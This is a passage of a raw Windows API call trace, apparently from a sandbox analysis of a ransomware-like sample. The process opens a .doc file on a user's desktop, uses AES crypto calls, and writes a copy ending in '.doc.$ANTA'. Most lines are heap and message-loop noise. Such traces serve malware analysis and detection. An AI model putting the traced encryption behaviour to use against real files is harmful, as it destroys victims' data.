lpMultiByteStr=0x1796fe8, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 [0131.526] CryptDestroyHash (hHash=0x41ac700) returned 1 [0131.526] PeekMessageW (in: lpMsg=0x144eb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eb54) returned 0 [0131.526] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0131.526] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0131.527] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0131.527] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0131.527] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\uI6dJwkjdmY9\\D-AgzySFKdtUp0Q.doc" (normalized: "c:\\users\\fd1hvy\\desktop\\ui6djwkjdmy9\\d-agzysfkdtup0q.doc"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2a0 [0131.527] SetFilePointerEx (in: hFile=0x2a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0131.527] SetFilePointerEx (in: hFile=0x2a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x144ec58 | out: lpNewFilePointer=0x0) returned 1 [0131.527] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabb0 | out: hHeap=0x1780000) returned 1 [0131.527] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9d0 | out: hHeap=0x1780000) returned 1 [0131.527] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabe0 | out: hHeap=0x1780000) returned 1 [0131.527] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf9a0 | out: hHeap=0x1780000) returned 1 [0131.527] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2830 | out: hHeap=0x1780000) returned 1 [0131.527] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0131.527] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27f0 | out: hHeap=0x1780000) returned 1 [0131.528] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796ea8 | out: hHeap=0x1780000) returned 1 [0131.528] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2840 | out: hHeap=0x1780000) returned 1 [0131.528] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27b0 | out: hHeap=0x1780000) returned 1 [0131.528] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0131.528] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac440 | out: hHeap=0x1780000) returned 1 [0131.528] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0131.528] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2800 | out: hHeap=0x1780000) returned 1 [0131.528] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796fc8 | out: hHeap=0x1780000) returned 1 [0131.528] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27f0 | out: hHeap=0x1780000) returned 1 [0131.528] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2780 | out: hHeap=0x1780000) returned 1 [0131.528] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac58 | out: hHeap=0x1780000) returned 1 [0131.528] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad78 | out: hHeap=0x1780000) returned 1 [0131.528] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabc8 | out: hHeap=0x1780000) returned 1 [0131.528] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41a4728 | out: hHeap=0x1780000) returned 1 [0131.528] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2800 | out: hHeap=0x1780000) returned 1 [0131.528] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cace8 | out: hHeap=0x1780000) returned 1 [0131.528] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27f0 | out: hHeap=0x1780000) returned 1 [0131.528] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8be8 | out: hHeap=0x1780000) returned 1 [0131.528] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27b0 | out: hHeap=0x1780000) returned 1 [0131.528] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x436a608 | out: hHeap=0x1780000) returned 1 [0131.528] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2900 | out: hHeap=0x1780000) returned 1 [0131.528] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa90 | out: hHeap=0x1780000) returned 1 [0131.528] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2750 | out: hHeap=0x1780000) returned 1 [0131.529] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\uI6dJwkjdmY9\\" (normalized: "c:\\users\\fd1hvy\\desktop\\ui6djwkjdmy9")) returned 0x10 [0131.529] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x436a030 | out: hHeap=0x1780000) returned 1 [0131.529] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2780 | out: hHeap=0x1780000) returned 1 [0131.529] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4369c10 | out: hHeap=0x1780000) returned 1 [0131.529] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2820 | out: hHeap=0x1780000) returned 1 [0131.529] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cacd0 | out: hHeap=0x1780000) returned 1 [0131.529] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28e0 | out: hHeap=0x1780000) returned 1 [0131.529] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\uI6dJwkjdmY9\\D-AgzySFKdtUp0Q.doc.$ANTA" (normalized: "c:\\users\\fd1hvy\\desktop\\ui6djwkjdmy9\\d-agzysfkdtup0q.doc.$anta"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x258 [0131.530] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac10 | out: hHeap=0x1780000) returned 1 [0131.530] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabb0 | out: hHeap=0x1780000) returned 1 [0131.530] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac40 | out: hHeap=0x1780000) returned 1 [0131.530] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf9c8 | out: hHeap=0x1780000) returned 1 [0131.530] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2810 | out: hHeap=0x1780000) returned 1 [0131.530] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0131.531] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2870 | out: hHeap=0x1780000) returned 1 [0131.531] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796f08 | out: hHeap=0x1780000) returned 1 [0131.531] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2800 | out: hHeap=0x1780000) returned 1 [0131.531] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27f0 | out: hHeap=0x1780000) returned 1 [0131.531] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0131.531] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac2c0 | out: hHeap=0x1780000) returned 1 [0131.531] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0131.531] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0131.531] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2800 | out: hHeap=0x1780000) returned 1 [0131.531] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e28 | out: hHeap=0x1780000) returned 1 [0131.531] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28e0 | out: hHeap=0x1780000) returned 1 [0131.531] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2880 | out: hHeap=0x1780000) returned 1 [0131.534] SetFilePointerEx (in: hFile=0x2a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x144eca8 | out: lpNewFilePointer=0x0) returned 1 [0131.534] ReadFile (in: hFile=0x2a0, lpBuffer=0x43eba98, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x144ecd0, lpOverlapped=0x0 | out: lpBuffer=0x43eba98*, lpNumberOfBytesRead=0x144ecd0*=0x4c98, lpOverlapped=0x0) returned 1 [0131.536] ReadFile (in: hFile=0x2a0, lpBuffer=0x43eba98, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x144ecd0, lpOverlapped=0x0 | out: lpBuffer=0x43eba98*, lpNumberOfBytesRead=0x144ecd0*=0x0, lpOverlapped=0x0) returned 1 [0131.536] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabe0 | out: hHeap=0x1780000) returned 1 [0131.536] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2900 | out: hHeap=0x1780000) returned 1 [0131.536] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabb0 | out: hHeap=0x1780000) returned 1 [0131.536] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1b81020 | out: hHeap=0x1780000) returned 1 [0131.539] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cacd0 | out: hHeap=0x1780000) returned 1 [0131.539] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac88 | out: hHeap=0x1780000) returned 1 [0131.539] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfc70 | out: hHeap=0x1780000) returned 1 [0131.539] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27f0 | out: hHeap=0x1780000) returned 1 [0131.539] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x49aa010 | out: hHeap=0x1780000) returned 1 [0131.539] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2750 | out: hHeap=0x1780000) returned 1 [0131.539] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0131.539] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2810 | out: hHeap=0x1780000) returned 1 [0131.539] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x49aa010 | out: hHeap=0x1780000) returned 1 [0131.539] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2870 | out: hHeap=0x1780000) returned 1 [0131.539] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac88 | out: hHeap=0x1780000) returned 1 [0131.540] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf9a0 | out: hHeap=0x1780000) returned 1 [0131.540] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2790 | out: hHeap=0x1780000) returned 1 [0131.540] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0131.540] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e88 | out: hHeap=0x1780000) returned 1 [0131.540] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28f0 | out: hHeap=0x1780000) returned 1 [0131.540] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2840 | out: hHeap=0x1780000) returned 1 [0131.540] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0131.540] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0131.540] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4392030 | out: hHeap=0x1780000) returned 1 [0131.540] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2870 | out: hHeap=0x1780000) returned 1 [0131.540] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2880 | out: hHeap=0x1780000) returned 1 [0131.540] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2870 | out: hHeap=0x1780000) returned 1 [0131.540] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2800 | out: hHeap=0x1780000) returned 1 [0131.540] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2870 | out: hHeap=0x1780000) returned 1 [0131.540] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caca0 | out: hHeap=0x1780000) returned 1 [0131.540] PeekMessageW (in: lpMsg=0x144eb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eb54) returned 0 [0131.540] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27b0 | out: hHeap=0x1780000) returned 1 [0131.540] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27b0 | out: hHeap=0x1780000) returned 1 [0131.540] PeekMessageW (in: lpMsg=0x144eb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eb54) returned 0 [0131.540] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad48 | out: hHeap=0x1780000) returned 1 [0131.541] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad60 | out: hHeap=0x1780000) returned 1 [0131.541] CharUpperBuffW (in: lpsz="__CRYPT_GETCALGFROMCRYPTKEY", cchLength=0x1b | out: lpsz="__CRYPT_GETCALGFROMCRYPTKEY") returned 0x1b [0131.541] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8be8 | out: hHeap=0x1780000) returned 1 [0131.541] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2800 | out: hHeap=0x1780000) returned 1 [0131.541] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2810 | out: hHeap=0x1780000) returned 1 [0131.541] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cafa0 | out: hHeap=0x1780000) returned 1 [0131.541] PeekMessageW (in: lpMsg=0x144e63c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e63c) returned 0 [0131.541] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caeb0 | out: hHeap=0x1780000) returned 1 [0131.541] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ae0 | out: hHeap=0x1780000) returned 1 [0131.541] CharLowerBuffW (in: lpsz="uint", cchLength=0x4 | out: lpsz="uint") returned 0x4 [0131.541] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cada8 | out: hHeap=0x1780000) returned 1 [0131.541] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29f0 | out: hHeap=0x1780000) returned 1 [0131.541] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf10 | out: hHeap=0x1780000) returned 1 [0131.541] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29a0 | out: hHeap=0x1780000) returned 1 [0131.541] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf70 | out: hHeap=0x1780000) returned 1 [0131.541] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2aa0 | out: hHeap=0x1780000) returned 1 [0131.541] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb048 | out: hHeap=0x1780000) returned 1 [0131.541] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a80 | out: hHeap=0x1780000) returned 1 [0131.541] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cadc0 | out: hHeap=0x1780000) returned 1 [0131.541] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf28 | out: hHeap=0x1780000) returned 1 [0131.541] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfdd8 | out: hHeap=0x1780000) returned 1 [0131.542] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b00 | out: hHeap=0x1780000) returned 1 [0131.542] PeekMessageW (in: lpMsg=0x144e63c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e63c) returned 0 [0131.542] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cada8 | out: hHeap=0x1780000) returned 1 [0131.542] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0131.542] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4392538 | out: hHeap=0x1780000) returned 1 [0131.542] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ad0 | out: hHeap=0x1780000) returned 1 [0131.542] PeekMessageW (in: lpMsg=0x144dfec, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144dfec) returned 0 [0131.542] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2950 | out: hHeap=0x1780000) returned 1 [0131.542] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29e0 | out: hHeap=0x1780000) returned 1 [0131.542] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a9188 | out: hHeap=0x1780000) returned 1 [0131.542] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae20 | out: hHeap=0x1780000) returned 1 [0131.542] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a70 | out: hHeap=0x1780000) returned 1 [0131.542] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a70 | out: hHeap=0x1780000) returned 1 [0131.542] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29e0 | out: hHeap=0x1780000) returned 1 [0131.542] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a20 | out: hHeap=0x1780000) returned 1 [0131.542] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a20 | out: hHeap=0x1780000) returned 1 [0131.542] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29f0 | out: hHeap=0x1780000) returned 1 [0131.542] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2980 | out: hHeap=0x1780000) returned 1 [0131.542] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b10 | out: hHeap=0x1780000) returned 1 [0131.543] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d01c0 | out: hHeap=0x1780000) returned 1 [0131.543] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2950 | out: hHeap=0x1780000) returned 1 [0131.543] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a70 | out: hHeap=0x1780000) returned 1 [0131.543] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ac0 | out: hHeap=0x1780000) returned 1 [0131.543] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cafe8 | out: hHeap=0x1780000) returned 1 [0131.543] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a00 | out: hHeap=0x1780000) returned 1 [0131.543] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2848 | out: hHeap=0x1780000) returned 1 [0131.543] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e28 | out: hHeap=0x1780000) returned 1 [0131.543] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cafb8 | out: hHeap=0x1780000) returned 1 [0131.543] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d00a8 | out: hHeap=0x1780000) returned 1 [0131.543] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2980 | out: hHeap=0x1780000) returned 1 [0131.543] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2950 | out: hHeap=0x1780000) returned 1 [0131.543] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ae0 | out: hHeap=0x1780000) returned 1 [0131.543] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0131.543] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad90 | out: hHeap=0x1780000) returned 1 [0131.543] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29a0 | out: hHeap=0x1780000) returned 1 [0131.543] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cada8 | out: hHeap=0x1780000) returned 1 [0131.543] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2990 | out: hHeap=0x1780000) returned 1 [0131.543] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad90 | out: hHeap=0x1780000) returned 1 [0131.543] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29c0 | out: hHeap=0x1780000) returned 1 [0131.543] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cada8 | out: hHeap=0x1780000) returned 1 [0131.543] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a80 | out: hHeap=0x1780000) returned 1 [0131.544] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad90 | out: hHeap=0x1780000) returned 1 [0131.544] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2980 | out: hHeap=0x1780000) returned 1 [0131.544] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cada8 | out: hHeap=0x1780000) returned 1 [0131.544] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2990 | out: hHeap=0x1780000) returned 1 [0131.544] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad90 | out: hHeap=0x1780000) returned 1 [0131.544] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a40 | out: hHeap=0x1780000) returned 1 [0131.544] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cada8 | out: hHeap=0x1780000) returned 1 [0131.544] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a80 | out: hHeap=0x1780000) returned 1 [0131.544] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad90 | out: hHeap=0x1780000) returned 1 [0131.544] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a80 | out: hHeap=0x1780000) returned 1 [0131.544] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cada8 | out: hHeap=0x1780000) returned 1 [0131.544] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29b0 | out: hHeap=0x1780000) returned 1 [0131.544] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad90 | out: hHeap=0x1780000) returned 1 [0131.544] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a30 | out: hHeap=0x1780000) returned 1 [0131.544] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cada8 | out: hHeap=0x1780000) returned 1 [0131.544] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2980 | out: hHeap=0x1780000) returned 1 [0131.545] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptGetKeyParam", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0131.545] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptGetKeyParam", cchWideChar=17, lpMultiByteStr=0x1796f28, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptGetKeyParam", lpUsedDefaultChar=0x0) returned 17 [0131.545] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad90 | out: hHeap=0x1780000) returned 1 [0131.545] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796f28 | out: hHeap=0x1780000) returned 1 [0131.545] GetProcAddress (hModule=0x756e0000, lpProcName="CryptGetKeyParam") returned 0x75712db0 [0131.545] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfe28 | out: hHeap=0x1780000) returned 1 [0131.545] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29a0 | out: hHeap=0x1780000) returned 1 [0131.545] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2950 | out: hHeap=0x1780000) returned 1 [0131.546] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29e0 | out: hHeap=0x1780000) returned 1 [0131.546] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29c0 | out: hHeap=0x1780000) returned 1 [0131.546] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a40 | out: hHeap=0x1780000) returned 1 [0131.546] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b10 | out: hHeap=0x1780000) returned 1 [0131.546] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d00a8 | out: hHeap=0x1780000) returned 1 [0131.546] CryptGetKeyParam (in: hKey=0x41ac180, dwParam=0x7, pbData=0x43e2a50, pdwDataLen=0x144e008, dwFlags=0x0 | out: pbData=0x43e2a50*=0x6610, pdwDataLen=0x144e008*=0x4) returned 1 [0131.546] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2980 [0131.546] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x214) returned 0x43e9128 [0131.546] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796fc8 [0131.546] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad90 [0131.546] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cada8 [0131.546] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cadc0 [0131.546] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a20 [0131.546] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cadc0 | out: hHeap=0x1780000) returned 